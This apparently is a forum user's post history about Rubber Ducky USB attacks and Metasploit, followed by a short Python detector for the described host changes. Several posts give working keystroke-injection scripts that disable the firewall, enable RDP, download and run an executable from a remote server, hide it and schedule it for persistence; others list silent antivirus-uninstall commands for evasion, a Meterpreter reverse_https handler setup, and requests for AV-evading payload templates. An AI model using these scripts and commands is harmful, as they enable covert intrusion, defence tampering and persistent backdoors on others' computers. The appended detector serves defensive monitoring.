
TeCHemically

Everything posted by TeCHemically

  1. Tried it again and I get the following. It is acting like the shell is there but I cannot interact at all. In fact the shell is acting like it is on the perimeter, not the host behind the public IP. I usually see the public IP then the internal host when I use reverse_tcp. In this method I get the shell functioning and on the internal client PC. Does the reverse_https payload require something else? Is it not pulling down the stage? Does this payload behave differently than reverse_tcp?

     exploit(handler) > exploit -j
     [*] Exploit running as background job.
     [*] Starting the payload handler...
     [*] <Public IP address>:60476 Request received for /JuQL...
     [*] <Public IP address>:60476 Staging connection for target /JuQL received...
     [*] Patched user-agent at offset 657384...
     [*] Patched transport at offset 657044...
     [*] Patched URL at offset 657112...
     [*] Patched Expiration Timeout at offset 657868...
     [*] Patched Communication Timeout at offset 657984...
     [*] Meterpreter session 1 opened (<IP address>:443 -> <Public IP address>:60476) at 2013-10-04 17:21:11 -0500
  2. I started the 32-bit listener and created the fxsst.dll with a 32-bit reverse_https payload. When it runs I get the following on my listening machine:

     Starting the payload handler...
     [*] <IP address>:5465 Request received for /JuQL...
     [*] <IP address>:5465 Staging connection for target /JuQL received...
     [*] Patched user-agent at offset 657384...
     [*] Patched transport at offset 657044...
     [*] Patched URL at offset 657112...
     [*] Patched Expiration Timeout at offset 657868...
     [*] Patched Communication Timeout at offset 657984...
     [*] Meterpreter session 1 opened (<IP address>:443 -> <IP address>:5465) at 2013-10-04 13:47:46 -0500
     [-] Failed to load extension: No response was received to the core_loadlib request.
  3. Very nice! I am having issues though. When the PowerShell command is entered a ton of red text flies by and the window disappears. No shell results. Sorry I don't have more information. Any help and direction is appreciated!
  4. Ok, after further testing this seems to be being caused by read/write errors likely associated with the ducky drive not unmounting correctly. No matter if I dismount from Windows Explorer or the system tray, it still stays visible and navigable in the Windows Explorer window. I have told it to dismount from the Explorer window and the system tray many times and it always throws up the "safe to remove" balloon; but alas, once I do remove it I get alternating fast and slow red blinking and no drive mount or code execution on the twin duck whenever it is inserted into any client. I have reflashed the firmware to no avail. Is anyone else having these SD card corruption/dismount errors?

     EDIT: putting the "inject.bin" file on the root with 2 other file folders causes this thing to fail. If I remove the inject.bin I am able to mount ducky storage. So with any payload on it the thing totally fails. With no payload the storage will mount. If I have the payload there but named incorrectly then I still have access to the storage. I am only seeing this failure now with the payload on the root of the SD named properly (inject.bin).
  5. I am very interested in this as well. I was looking at scriptjunkie's article "Why Encoding Does not Matter and How Metasploit Generates EXEs" and was wondering how I could implement the c output of my custom shellcode into a custom or pre-existing exe. Any resources and/or advice is greatly appreciated!
  6. scriptjunkie detailed this type of thing in an article on his site called "Why Encoding Does not Matter and How Metasploit Generates EXEs". So, should I attempt to modify an existing exe or is it simpler to create my own for this purpose?
  7. I used msfvenom and it gave me the output of my custom shellcode. How difficult is it to implement that into a custom exe / exe template that I can use for AV evasion? I have a thread on this started under Security; if you could shed some light that would be amazing. Thanks for all your help! :)
  8. I would like to know if there is a way to generate random exe templates for injecting custom shellcode into; just like msf pro does. Is there a manual way to do this? If not, where can I find the information I will need to write my own? I am not a programmer so this will need to be VERY good instruction for me to be able to follow. I am willing to learn but I am very inexperienced here. I basically need to be able to create my own custom/random exe template then know how to add the custom shellcode into it that is created by msfvenom's output so that it runs. Thanks to all who help!
  9. So, I have to ask. Since you have "I remember" playing on that vid. Do you recognize my avatar?
  10. Beautiful, great work man! I just watched your vid. You have yourself another subscriber.
  11. I am having issues with msfvenom though. Using msfpayload and piping into msfencode worked to create the aforementioned dll but I don't see the options I need in the help of msfvenom.
  12. So to start the handler would I use the following:

     use exploit/multi/handler
     set LHOST 0.0.0.0
     set LPORT 443
     set PAYLOAD windows/x64/meterpreter/reverse_https
     set ExitOnSession false
     exploit -j
  13. You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D
  14. After further testing it appears as though the SD cards have been somehow corrupted or damaged by the twin ducky. I reflashed the firmware and got no change. I checked the SD cards on 2 other PCs (one Linux, one Windows) and on the Windows PC I got "I/O" errors in the pop-up dialog box. I am always "safely removing" the mounted storage before I take it out of the PC I am working on. Has anyone else had SD corruption issues with the twin duck? Thanks to all who reply! :)
  15. I am also having issues with Twin Duck original firmware. It has been functional through my testing today but just about a half hour ago the DUCKY storage drive no longer mounts and the inject.bin does not run either. Tried on 2 PCs. I get an alternating fast and slow red LED flashing on one PC and I get no lights at all on the other. The storage will mount if I put the SD card in another reader.
  16. I found the following little tidbit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D

     VirusScan Enterprise (VSE) command line removal using msiexec.exe: Click Start, Run. Type the removal string for your version of VSE, then click OK.

     VirusScan Enterprise 8.8
     msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q

     VirusScan Enterprise 8.7i
     msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q

     VirusScan Enterprise 8.5i
     msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q

     VirusScan Enterprise 8.0i
     msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q

     Switches that you can use with msiexec.exe:
     /q  The quiet switch ensures the removal is done silently - nothing is displayed.
     /x  This switch will automatically remove an installation.
     /i  This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation.
     /?  This switch provides additional information on all msiexec.exe command switches.
  17. Thanks for the help! :) Can the 64-bit https meterpreter shell run on a 32-bit machine? Also, I generated the above-mentioned dll via msfconsole but the command I used just allowed me to specify https. Is this created 64-bit by default or is there a part of the command I missed that will create the 64-bit shell? Thanks again, this is a great method!
  18. Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connection being so noticeable? I try to make sure my listener is on a common port so it can get through the network firewall and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thanks again!
  19. Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management".

     DELAY 5000
     ESCAPE
     DELAY 400
     CONTROL ESCAPE
     DELAY 400
     STRING cmd
     DELAY 400
     MENU
     DELAY 400
     STRING a
     DELAY 700
     ALT Y
     DELAY 800
     ENTER
     STRING netsh firewall set opmode disable
     ENTER
     DELAY 300
     STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
     ENTER
     DELAY 300
     STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
     ENTER
     DELAY 300
     STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
     ENTER
     DELAY 300
     STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe"
     ENTER
     DELAY 300
     STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2
     ENTER
     DELAY 300
     STRING y
     ENTER
     STRING exit
     ENTER
  20. This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D

     ******************************************************************************
     DELAY 5000
     ESCAPE
     DELAY 400
     CONTROL ESCAPE
     DELAY 400
     STRING cmd
     DELAY 400
     MENU
     DELAY 400
     STRING a
     DELAY 700
     ALT Y
     DELAY 800
     ENTER
     STRING netsh firewall set opmode disable
     ENTER
     DELAY 300
     STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
     ENTER
     DELAY 300
     STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
     ENTER
     DELAY 300
     STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
     ENTER
     STRING exit
     ENTER
     ******************************************************************************

     You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above. Then in terminal type the following 2 commands:

     cd /usr/share/ducky/encoder
     (for Kali; if using a different OS then cd to the directory your "encoder.jar" file is in)

     java -jar encoder.jar -i payload.txt -o inject.bin
     (now place the "inject.bin" file on your ducky and use as you normally would)
  21. Everything appears to have been successful on the client side; but I don't get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue.

     EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.
  22. No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?... Nevermind, I found it in the home directory. Thanks again! :)
  23. Great script, I am super excited to test this one out :D One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 minutes ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:

     [*] Generating shellcode
     /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT)
     	from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'
     	from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'

     Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)
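Added detection example, not from any of the posts above: a small Python checker that flags process command lines matching the host changes described in posts 16, 19 and 20 (silent VSE uninstall via msiexec, host firewall disabled, RDP enabled through the registry, a hidden executable in the per-user Startup folder run by a scheduled task). The sample log lines are constructed; the product codes are the ones listed in post 16.

```python
# Uninstall product codes for McAfee VirusScan Enterprise, taken from post 16 above.
VSE_PRODUCT_CODES = {
    "{CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF}": "VSE 8.8",
    "{147BCE03-C0F1-4C9F-8157-6A89B6D2D973}": "VSE 8.7i",
    "{35C03C04-3F1F-42C2-A989-A757EE691F65}": "VSE 8.5i",
    "{5DF3D1BB-894E-4DCD-8275-159AC9829B43}": "VSE 8.0i",
}

# Per-user Startup folder fragment used by the persistence script in posts 19 and 20.
STARTUP_DIR = r"\start menu\programs\startup"


def classify(cmdline):
    """Return the indicator names matched by one process command line (case-insensitive)."""
    c = cmdline.lower()
    hits = []
    if "netsh" in c and "firewall" in c and "opmode" in c and "disable" in c:
        hits.append("host_firewall_disabled")
    if "reg add" in c and "fdenytsconnections" in c and "/d 0" in c:
        hits.append("rdp_enabled_via_registry")
    if "schtasks" in c and "/create" in c and STARTUP_DIR in c:
        hits.append("scheduled_task_runs_startup_folder_exe")
    if "attrib" in c and "+h" in c and "+s" in c and STARTUP_DIR in c:
        hits.append("hidden_system_attrs_on_startup_exe")
    if "msiexec" in c and "/x" in c and "remove=all" in c:
        for code, name in VSE_PRODUCT_CODES.items():
            if code.lower() in c:
                hits.append("silent_av_uninstall:" + name)
    return hits


def scan(log_text):
    """Run classify() over each line; return (line, hits) pairs for lines that matched."""
    alerts = []
    for line in log_text.splitlines():
        hits = classify(line.strip())
        if hits:
            alerts.append((line.strip(), hits))
    return alerts


# Constructed sample of process-creation command lines (not real telemetry).
SAMPLE_LOG = """
cmd.exe /c netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
attrib +H +S "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winmgmt.exe"
schtasks /create /tn Management /tr "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winmgmt.exe" /sc hourly /mo 2
msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q
notepad.exe C:\\Users\\u\\notes.txt
"""
```

Running `scan(SAMPLE_LOG)` returns five alerts and leaves the notepad line alone; a real deployment would feed it process-creation events (e.g. Sysmon event ID 1 command lines) instead of the embedded sample.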